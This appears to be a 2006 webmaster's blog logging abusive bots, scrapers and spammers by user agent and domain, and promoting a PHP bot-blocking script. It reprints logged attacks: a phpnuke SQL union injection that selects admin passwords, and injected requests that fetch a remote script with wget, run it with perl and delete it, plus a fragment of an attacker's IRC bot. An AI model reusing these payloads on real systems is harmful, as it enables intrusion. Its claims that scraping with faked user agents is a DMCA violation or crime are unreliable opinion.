Sep 29, 2006

Web Scrapers Violate the Digital Millennium Copyright Act

The Digital Millennium Copyright Act makes it a crime to create software
that allows a user to get around any copy protection used to stop
theft of copyright content.

Companies that create bots that fake useragents to get around our blocks
violate the DMCA.

We need a class action lawsuit against these software authors that create Web Scrappers. abuse unknown bot

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]

Robot fakes useragents.
Loads the robots.txt file and then loads files it is told not to.
Has fallen into the bot trap several times.

This bot holds this IP and is hosted on

added to domain ban,Unknown Canada bot kostanay spam

ThePlanet is offering internet access to businesses so we have to be carefull about banning that domain.

Verified robots list that need to be banned

Update I am fed up with this bot its trying to place orders on my store using only a name and city. And is copying all the keys off the pages.
name : alex
city : kostanay

So everything from is now banned.

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1) abuse


Resolve Ltd. is a Russian hosting company which appears to be involved in fraud schemes. A search on the ip address will return a lot of spammed guestbooks, mostly for pills. Apparently the spammer specialised on targetting the Advanced Guestbook script. The bot is using both random user agents and proxy servers and the referrer pointed to the domain

This robot was caught scanning with no agent which is automaticaly blocked. To prevent entry by any of its other fake agents the domain needs to be added to the domain block list.,guestbook spam and Fraud

Sep 27, 2006

Just what is

We receive a lot of abuse from this domain and a lot of webmasters are blocking it.
But since the domain has no website it was not clear what it was.
After a long search I have discovered that its British Telecom DSL.
See DSL report page. This was the only site that told what it was.

Why the lame tecs at BT dont have a website at that domain is confusing because not knowing what it is is getting BT customers globaly banned. should not be banned as it is a ISP
It is not clear yet if dsl modems keep the same IP so we have to ban by IP until we know.

To the folks at BT Please put a website at

Sep 25, 2006

necbot/1.0 (nec labs america)

necbot/1.0 (nec labs america)
All Hits From

I can find no info on this bot.

The IP is registered to NEC but its confusing as to why NEC has a bot. This might be banned later as we are not sure what it is.

OrgName: NEC Laboratories America, Inc.
OrgID: NLA-29
Address: 4 Independence Way
Address: Suite 200
City: Princeton
StateProv: NJ
PostalCode: 08540
Country: US bad bot

First the bot falls into a bot trap it found from reading the robots.txt file.
mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)

Just to make sure it hots the bot trap again with another useragent
mozilla/4.0 (compatible; msie 5.0; windows xp) opera 6.05 [en]

Then it tries to scan the site. Note how its user agent changes as it scanns.

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)

This one gets stoped by BB as improper headers
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)

Stoped by BB
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)

It just keeps hammering like this but never gets in.

SO what is this bot doing?

Sep 24, 2006

baiduspider bad bot ignores robots.txt


This is a china search system that indexes sites writen in chinese I think.
Since my sites are in english I don't understand why its trying to index me.

It says to add "baiduspider" to your robots file. I did this months ago but its back.
It is ignoring the robots.txt file.

The above IPS are in the blacklist as spammers. See link. You hace to click on OPEN RBL and then when the second window opens click on LOOKUP this will display all the block list in red.

It has been added to the useragent ban list and is blocked but it just ignores the
eror and keeps comming abck. Its time to add the IPS to the Server IP ban.

deny from
deny from
deny from

More work needed to find all its ips. BOT


What is this Mozilla 7 thats invalid. Some kind of bot. The website has what looks like a guestbook on its frontpage.

It hit 2 of my domains and was stoped by BB as invalid.

compatible; MSIE 6; Win32; Mck IS it a new bot?

User-Agent claimed to be MSIE- with invalid Windows version

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Mozilla/4.0(compatible; MSIE 6; Win32; Mck); .NET CLR 1.1.4322; InfoPath.1)

What is this useragent? It first looks ok stating
compatible; MSIE 6.0; Windows NT 5.1;
But then has a second part that which looks like the useragent is starting over.
Mozilla/4.0(compatible; MSIE 6; Win32; Mck); .NET CLR 1.1.4322; InfoPath.1)
Inside this strange string is another browser version.
compatible; MSIE 6; Win32; Mck

What is MSIE 6 This is invalid
What is Win32 this is also a invalid version
What is Mck
Why is Mozilla/4.0 repeated?

If this is not some strange proxy then this is a new bot.

This is banned by BB as a invalid windows version. harvstor

This bot is a Spammers dream. It is creating a database of all websites
NAME ADDRESS PHONE# & EMAIL ADDRESS Once finished it will have a search option to look up the data.

This is why you should not post your name address and phone# on your website. Give this data only to customers who place orders. Or require a customer to have an account before its displayed. New customers only need a contact form.

It claims it will not display anyone not in a "Trade Register" don't know what that is but if its true why are they scanning non business websites?

Read the translation of what they are doing here.

Email/Contact info Harvestor.

Sep 20, 2006 abuse

mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)
83 hits From

The above is one of the suspected useragents that always turnes out to be a robot and not a browser. A search of google shows a lot of abuse from this domain so its banned.

domain ban list,pro spam host

Sep 19, 2006

LWP::Simple/5.48 FastCounter Robot using LWP


The bcentral FastCounter sends out a robot to check your link and verify your site. However this robot doesn't have its own useragent it uses "LWP::Simple/5.48" which is banned by most everyone is a spambot.

Atempts to report this failed because both the chat and email contact forms do not work on the site. I also just discovered that FastCounter free is no longer free unless you had already created your counters before 2005 I have about 15 such counters so mine are still working.

If you have trouble with your counters not working you will have to add the above ip to the whitelist.

Just what is blogslive - Admitted Data-Minner

blogslive (

Blogslive will visit your blog the same day you create it.
The is just a godady parked webpage no such site exist.
The website also does not exist it redirects to

To quote this website.
With solid data-mining technology, superb research and Nielsen’s unrivaled experience in media measurement and client services, we help today’s companies, brands and business professionals better understand the influence and impact of CGM on products, issues, reputation and image.

So the blogslive is what I suspected all along its a fake robot for used to data-mine your website so they can sell your content to others. Can you say copyright violation?

Banned Banned Banned.................... fakes google

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)

This IP was caught faking the google proxy which is banned because anyway because its a proxy.

Sep 17, 2006 dragonfly bot

dragonfly( rdirects to enmax has something to do with utilities cant tell what they are but they and not a ISP and should not be running a robot.

Both the domain and useragent should be banned.,Email harvestor spam tool

isc systems irc search 2.1

Caught this spam harvestor running on a domain that has no website.

Add to domain ban,Spam Email Harvestor SpamBot

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

This is a MLM company. Could not find any tracks in google must be a new spambot they have started up this week.

This domain should be added to the ban list.

I do see a court setelment on pyramid marketing here

Domain ban,MLM co running Unknown Bot

Sep 13, 2006 abuse

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Yes the above useragent is one of the known spam tools.
This domain has a page saying they will be back up soon while a google of the domain shows posting on adult webmaster forums.

This domain is banned for using spam tools.,Caught using spam tools

Sep 12, 2006

trishuli.cs.UMBC.EDU spambot

Java/1.5.0_02 trishuli.cs.UMBC.EDU

This is known spam software use to harvest email addresses.
It is running in the Computer Science Dept of the University of Maryland.

This has been reported. bot

From Germany has no agent.

Its not clear what this bot is trying to do. Its always on the same IP and only hits the top page. Guestbook Spammer

ADD Spam robot Trap
mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)

After doing a search I see that this domain often turns up on guestbooks posting spam so this domain is now added to the domain block.,Guestbook Spammer

IRLbot/2.0 bot banned

Request : /contact.html
IP :
Agent : IRLbot/2.0 (compatible; MSIE 6.0;

This bot didn't make it into the site it went straight to a old contact form that had been removed due to spam and hit it 7 times.

This bot was banned long ago for being a waste of bandwidth being that it only takes our bandwith and gives nothing back.

To quote the website.
"Texas A&M research project sponsored in part by the National Science Foundation that investigates algorithms for mapping the topology of the Internet and discovering the various parts of the web."
Thats great and all but Texas A&M needs to use its own bandwidth for this project and not ours.

Mozilla/5.0 Agent by itself

Agent: Mozilla/5.0
Agent: Mozilla/5.0
Agent: Mozilla/5.0

As you can see the same bot hit from 3 places one after another.

I have seen this before being used by the hackers it is clearly some type of hack tool or script.

To prevent false alarms this can not to be added to the useragent ban list it must be hard coded in as an exact match which will be done in the next release of MMAUTOBAN. v3.3

Sep 11, 2006

sproose/0.1 (the Sproose Goose bot)

Agent: sproose/0.1 (sproose bot;;
from Ips
Most likely others but we are not keeping track.

Free Image Hosting at

The Sproose Goose is banned because its a startup with no content. Scrappers often use the fake startup scam to get past blocks. Unless the sproose goose actualy does fly. They will stay banned. Right now we do not know if this is a real company or a scraper.

Robot was caught following links it should not be able to see because its banned. Ony way it could be doing what its doing is if it were following google listings back to our site.

Added to UA Start file
sproose/0.1,Fake Startup co

Sep 9, 2006 Hacker

ADD ALARM: */select/* injection
modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0-0-pwd-0-aid/**/FROM/**/nuke_authors GET HTTP/1.1
Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; simbar enabled; simbar={ff31d371-c0bf-4f98-ac32-ccaee7d5f828})

The above atempted union injection hack of the phpnuke database was detected and the ip autobanned by M&M Autoban.

One wonders why I am seeing a lot of hackers with simbar enabled in the user agent.
None of my regular visitors have simbar.

Sep 7, 2006 spoofed?

Blacklist Domain Ban: Entire range spoofed by hackers
Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.2; wow64; sv1)

Word is that someone is using microsoft ips.

One would think MS would be using msie 7 if it was real.

Update I started seeing what looked like valid users so this domain was removed from the ban list but is being watched.

Bad Behaivor Whitelist adjustment

Bad behaivor has some problems with known good bots. You need to adjust your whitelist to let them in.

edit the whitelist.php and change the $bb2_whitelist_ip_ranges to.

$bb2_whitelist_ip_ranges = array(
// Looksmart
// Scooter/3.3
// YahooSeeker/1.2
// FreeFindRobot Good bot with some header problems
// banner tester

These are known bots that BB blocks due to header problems. Without this change altavista scooter will not be able to index your site. has been added because the new robot they use is blocked as a spambot. abuse

bad-behavior 400 Required header 'Accept' Missing.
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)

Thought to be a scrapper. See other info here

Reports now say that this is content filtering.
If it is its the worst bot ever writen because it fakes its useragent and sends ilegal headers. Clearly not the tec leaded it says on the website.

Writing to lightspeed and waiting for a reply.

Update: refuses to reply to my emails so its banned I don't care what they say it is. It is abuse because they are faking the useragents and are using improper headers and they do not identify themselves in the scan.

added domain ban,Wont reply to emails abuse

Also banned by all blogs using Bad Behavour

Sep 6, 2006 Java/1.5.0



Valueclick and are the same company. It is unclear why they are using this useragent. This useragent is blocked as a known spam tool they should not be using it.

This has been reported to valueclick and

after 1 month CJ sent this reply to the problem of a broken useragent string.

For further details, regarding our Network Insight Spider, please access the following URL:

Well....... Hummm what am I to say to that answer?

And people wonder why customer service people have a bad rep.

What to do.
This looks like a legit bot that needs to be let in, however cj would not reply if it was the real cj bot or not.
The ip needs to be added to the whitelist in BB and M&M Autoban however I have not seen it this month so it may be fixed. Will have to wait and see.

But anyway no point in writing to them again all they game me after 1 month was the URL thats in the normal useragent string.

How to protect your site

Protect your website in realtime.
As seen on PC Magazine

Protect your PHP site and scripts from bad abusive robots that use up your bandwidth.

Have you checked your logs only to find you have more robot or unknown users than you have real visitors.

Examples of what is visiting your site
Robots watching to see if your domain expires
Robots from some startup search engine no one will ever use
Robots from search engines in languages you dont serve
Robots from companies trying to see if you volated some copyright
Robots from some government website monitoring for some unknown content
Robots trying to collect email addresses
Robots trying to hack into your site
Robots pinging your scripts in an atempt to get your software to list they came from
Robots probing for scripts called modules.php posting.php submit.php and others
Robots using random agents to avoid blocking.
Hackers trying to use union injections on your database

Copyright owners have the legal right under the DMCA to reserve the right to view content only to website visitors. Webmasters have the legal right under DMCA to block access to anyone who wants to store or copy website content. It is also a crime under US law to use any trick or false information to gain access to a computer system. Running a robot that pretends to be a user by faking its useragent is crime under US Law because it is using false information to gain access to a computer system.

M&M Autoban can be used as a Bot-Trap to autoban every ip that hits a trap listed in your robots file. It is included in all of your php scripts to check the user against the ip ban list and then verify that the visitor qualifies to visit your website.

You can not just send spam bots into a endless fake email loop unless you have unlimited bandwidth and you don't care about a slow server. And it doesn't hurt them anyway. A spam bot must be terminated ASAP with as little bandwidth being used as possible.

Works with Bad Behavior but BB is not required.

Works on all PHP scripts needs no database!
Prevents Union Injections and known hacks.
Tracks agents
Set blocking list anyway you like

Now works With Wordpress.

Clich on downloads to the right. abuse Corp. Snooper

Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040218 Galeon/1.3.12
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]
Mozilla/5.0 (compatible; Konqueror/3.1; Linux; en)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)

All of the above were blocked by bad-behavior as having defective headers.
Only 1 old win85 bot gets past BB but is blocked by our domain ban.
mozilla/4.7 [en] (win95; u)
mozilla/4.7 [en] (win95; u)

This has now all been tracked back to a service called "Brand Audit and Patrol" it visits our sites to see if we are saying bad things about brand names. And to check if we have brand logos.

Problem is that they are using a defective robot that is blocked by all blogs that use Bad behavior. Its likely that this patrol bot can not even see 60% of all the blogs its trying to scan due to poor programming.

Also this robot fakes useragents to gaining access to websites in violation of US federal law. Which makes it a crime to use false information and or any trick to gain access to a computer system.

This domain is banned for wasting bandwith and using false information and tricks to gain access to website content.,brand audit patrol Funny
Blacklist Domain Ban: Godady web hosting -
Unknown bots

Agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr

Domain: doesn't have a website it redirects to which is godady
payment service.

How does someone run Windows on a godady server. They dont its a bot
and its scanning for info on who is blocking bots, Funny. What does this
tell you.

We were banning just part of this domain but now suggest banning the
entire thing.,Godady web hosting - Unknown bots

Panscient Data Services

Orginaly the bot was detected scanning the site using a fake useragent. This was reported to who sent back a canned reply that this was a nice bot and followed robots file.

My orginal request for info on who ran the bot and why it was faking a useragent of a browser were ignored.

I replied back to abuse and asked if owned this bot and why it was using a fake useragent if it was a nice bot. But my questions were ignored and all I got back was the same canned reply. knows about this bot, allows it to operate, hides the idenity of its owner and ignores complaints about it.

This bot was built by it is unclear if they own it.

At Panscient Technologies we design, build and operate custom internet search engines that unlock the hidden structure of web data.
Using state of the art AI technology, Panscient Technologies' software analyzes web sites for their information content and compiles the data into a searchable index.

Yea right state of the art scrapping.

At this time it is unclear who else uses this bot because its stealth.

Add to domain ban list,Abuse

or to the ip ban on your server Singapore


This domain redirects to which is a proxy. Since the url being atempted was one that spammers hit I suspect they were trying to get by my blocks. I don't know why the spam never gets posted even when they get past the block. Lammers....

I tested this proxy by taking it to the bot trap and got this. It passed my useragent.

I can not tell where they got the from it did not come from that proxy must be running more than one both need to be banned.

See post on guestbook spammer running on

Domain Ban.,Singapore proxy,Singapore proxy

Union Injection hackers

Ever since I posted on my new anti union injection module hackers have been trying to hack my forums. Someone tell me something. Perhaps I don't usderstand this but why would a hacker show me just how he hacks a site so I can take that info and adjust my script to block such hacks?

All his atempts were blocked even by my alpha script.

modules.php?basepath=;wget%20;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? GET HTTP/1.0
Agent: mozilla/5.0

modules.php?basepath=;wget%20;perl%20mambo1.txt;rm%20-rf%20mambo1.*? GET HTTP/1.0
Agent: mozilla/5.0

modules.php?basepath=;wget%20;perl%20mambo2.txt;rm%20-rf%20mambo2.*? GET HTTP/1.0
Agent: mozilla/5.0

modules.php?basepath=;wget%20;perl%20mambo2.txt;rm%20-rf%20mambo2.*? GET HTTP/1.0
Agent: mozilla/5.0 is banned

Here is part of his IRC script code.
my $linas_max='4';
my $sleep='5';
my @adms=("xxxxx","ok","mos","KKTeam");
my @canais=("#phpnuke");
my $nick='shutup';
my $ircname ='Stop';
chop (my $realname = 'uname -rs');
$servidor='' unless $servidor;
my $porta='8200'; link checker link checker

This bot looks like its using a link checker downloaded from

I think this is a scrapper whatever it is its pretending to be has no website so its suspent right out of the box.

Its banned by agent and domain. / answerbus bot

This bot first came in using a agant for a text browser. Clearly fake.

lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a

After a week they changed user agents to.

answerbus (

Now they are back to using a fake text browser agent. Perhaps its 2 bots.
lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a

lynx/2.8.5dev.16 libwww-fm/2.14 ssl-mm/1.4.1 openssl/0.9.7a

It often came in with refers that tracked back to its scraper site.

All of these websites have the same thing on them. it looks like a search system and even says "supported by research grants from ....." I dont know if thats true if it is they should ask for the money back. Unless they support scrappers?

I tested this search system using my keywords for my sites and what I found were listings with my text and site name that looked like they were links to my site but when clicking on them I was taken to other scrapper linking sites.

This thing is banned by domain and user agent.

Update bot getting very active suggest adding to server ip ban

deny from
deny from
deny from
deny from


blogsearchbot-pumpkin-2 GET HTTP/1.0

I don't know what pumpkin is but its banned.

They say it doesn't read robots I dont care with no ideal what it is its banned.

Sep 5, 2006 abuse

wells search ii
wells search ii
wells search ii

Have been seeing a lot of this Spam Harvestor running on

Also turned up at

This is a known spam harvestor.

SuperCleaner 2.84

What is useragent
Mozilla/4.0 (compatible; SuperCleaner 2.84; Windows NT 5.1)

SuperCleaner 2.84 is a disk cleaner so why is it trying to visit my site?

Bad behaivor is blocking it due to incorrect format.

Unless I can find out what SuperCleaner 2.84 is it will be added to the block list.


Welcome to the new Blog. I had to move from the forum over to here because of all the atempts to hack the forum software.

All the old post from the forum had to be purged so I could get them out of the gogle index.

I will atempt to repost the major ones here.